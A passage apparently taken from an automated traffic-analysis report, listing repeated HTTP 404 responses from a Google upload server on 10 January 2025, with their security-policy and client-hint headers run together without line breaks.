ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6CTaJF6li4qfG1Jbp1vyIYNwLQUabViIf8xxTdMd_8LUeI-936oOGOEbpTosc3n_HCB3wy9IMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:55:18 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-DTbENDwtkkTkdYQxvy9cYw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQys0xdjd8d0iAhgMTYC5amCQIvmqi0DftZIdE3lSX3882aKe-U6n1dMcN5fCGKyPMiContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:55:21 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-wefIlMyrmVpfA3R0VLu4kA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRDjHdwOpl_xT2NVQp5cBMnB3tDYaDrlxa5LRI03XB3bxUuElUQunq8YdEhhKxdJm4iContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:55:23 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-po9Sh3lnv_bhWJ3v8q_fuw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRO57T2K7colnyhwUvPUvlJmClTN9Ob3CWxV8jFKMtVDfC1neRRWjhIEJghe4-4lq6P3JXQZmkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:55:25 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce--1ESJaz01lvLRX6oC-dW-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6tVDUW1WOIG1l1VGlPaLlJl5tH4LRkzvxkdnlbxdyicur_gge-AhAC1aq24tFfihqwd2G7u9MContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:55:27 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-x_mUsV-kCI9W_X2uyM-4Og' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC53rXWdShk70ZKEUjonQe00GcMxIFVLx0w08FqAmCDSz4spfPG5YL6nNnEH29zZOocyeIC6yJUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:55:30 GMTContent-Security-Policy: script-src 'nonce-fpRRdPgB7GNO4OZkEKV_MA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRVR5IzLRpnnnxydUREqmjRS7TJXteTZSvxFEPKRB1WsvUXnEBhfS63MbCjSUIKq2GP82x9zjEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:55:32 GMTContent-Security-Policy: script-src 'nonce-oE9DqlJ-biK9lOHqag4IXQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6xy2g5oD9MlsZghyM24Cnra8ksW78bMI-cSf37RIpo3L8A6HRgyDrB1YwPmZV72M6yqr6P97UContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:55:34 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-UIFcNqTO4bQG0gTulio-8Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTplvhlpSkaDDdu84SgxV6Jm9vxeHfVJ4Opaj8hp7mu_FSk4WskrPqY_u5k0ZT_avlVContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:55:37 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-BuUoHJHvmV5bNAkyCIqGOw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgT80GsH_rRwzIaQ0o-d2cJcaa_l-GxTdJs4pXNDlRSyLmL-kRrM-TuHPzJAXIwOYzPUKXWxnwoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:55:39 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-SUdzpVuTCDr5A-kMOEId5A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRruTxswkbqe_ZywVMhnsirG74YjX_yC1uUe8TnowlSORAQM0hGedBlWgN07nvbgT49HOLiKuoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:55:41 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-tHQsnM7_kzIX5Uc_y39CeA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7125rOZLJkYAqH8_XKGSO2hw7V0L9VCcFcVvxFd8uVpRpSZdF2dRRxbqW7RExbNDqf_JQbmfYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:55:44 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-M_LpJyStBhvDr60Aj4d1Hg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC59DtgYvImoCUKpyOJU2rryNrML5FTqWHMjclJN9zXFuh_MCf1rm8kDb1enhwRX5yh8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:55:46 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-XPYyQiHb1P7pQwGqRObfHg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRDxVkgOpnc0PBTqVzi6X0AXzLturf9v2kFRWkZMCWLo_Z9KymZu6CpimXuaGXhStNIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:55:48 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-cIFQRqOBdjigvFZ33GPdsw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4f8Wtqto45LfB1nbQ3PuH4OXaE-abP7oJC7D9S3u8kcFKteExGw4FJYR75LIFOloQjlWTqXpYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:55:50 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-JZFswajyLKWTVY-3qOK1QA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: 